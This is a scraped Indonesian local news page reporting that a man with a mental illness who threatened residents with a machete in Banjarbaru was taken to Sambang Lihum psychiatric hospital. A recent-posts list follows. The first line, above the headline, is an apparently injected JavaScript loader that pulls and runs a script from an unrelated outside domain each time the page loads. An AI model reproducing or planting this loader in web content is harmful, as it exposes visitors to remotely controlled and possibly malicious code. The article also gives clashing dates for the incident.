(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Ngamuk Pakai Parang di Sungai Tiung, ODGJ Dibawa ke Sambang Lihum


KANALKALIMANTAN.COM, BANJARBARU – Seorang lelaki paruh baya alami gangguan jiwa di Kelurahan Sungai Tiung, Kecamatan Cempaka, Kota Banjarbaru, diamankan pada Rabu (17/2/2024) siang.

Sejumlah personel kepolisian, dinas sosial, kelurahan, hingga Puskesmas, dan warga mengamankan ODGJ (Orang Dengan Gangguan Jiwa) itu karena mengamuk mengunakan parang.

Kapolsek Cempaka AKP Syuaib Abdullah mengatakan, lelaki itu adalah M Syair (48) dan sudah kerap dilaporkan warga karena meresahkan lingkungan sekitar.

Baca juga: Terjerat Cuci Uang Narkoba, Nasib Ayah Fredy Pratama Tinggal Ketuk Palu

“Berdasarkan informasi dari pihak keluarga bahwa M Syair mengalami ganguan jiwa sekitar 10 tahun terakhir,” ungkap Kapolsek Cempaka AKP Syuaib Abdullah, Kamis (18/4/2024) siang.

Lelaki itu, katanya, ditemui mengamuk di hadapan warga sekitar mengunakan parang dan menyerang warga dengan memakai ketapel.

“Bersama pihak terkait kita merujuk ODGJ tersebut ke Rumah Sakit Jiwa Sambang Lihum,” jelas dia.

Baca juga: Ini Harga Beras di Pasar Bauntung Banjarbaru Pasca Lebaran

Saat proses evakuasi, petugas sempat melakukan pendekatan langsung dengan M Syair, namun tidak membuahkan hasil, hingga akhirnya evakuasi paksa dilakukan dengan back up petugas SPKT Polsek Cempaka. Kendati demikian dirinya mengatakan, proses evakuasi berlangsung situasi berjalan lancar, aman dan terkendali.

“Bhabinkamtibmas berupaya memberikan suport dan dukungan kepada keluarga dan pasien tersebut, serta menyampaikan agar dilakukan perawatan dan pengobatan terapi jangka panjang,” sebutnya.

Di sisi lain, katanya, petugas gabungan menyampaikan agar masyarakat tidak mengucilkan dan mendiskreditkan permasalahan kesehatan jiwa anggota keluarganya.

Baca juga: Harga Emas di Pasar Bauntung Banjarbaru Terus Naik dari Ramadan hingga Lebaran

“Sebaliknya justu menjadi sistem pendukung yang kuat yang dapat membantu mengembalikan keluarga mereka ke kehidupan yang berkualitas dan sehat,” tuntasnya. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

24 menit ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

52 menit ago

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

15 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

17 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

19 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

20 jam ago

This website uses cookies.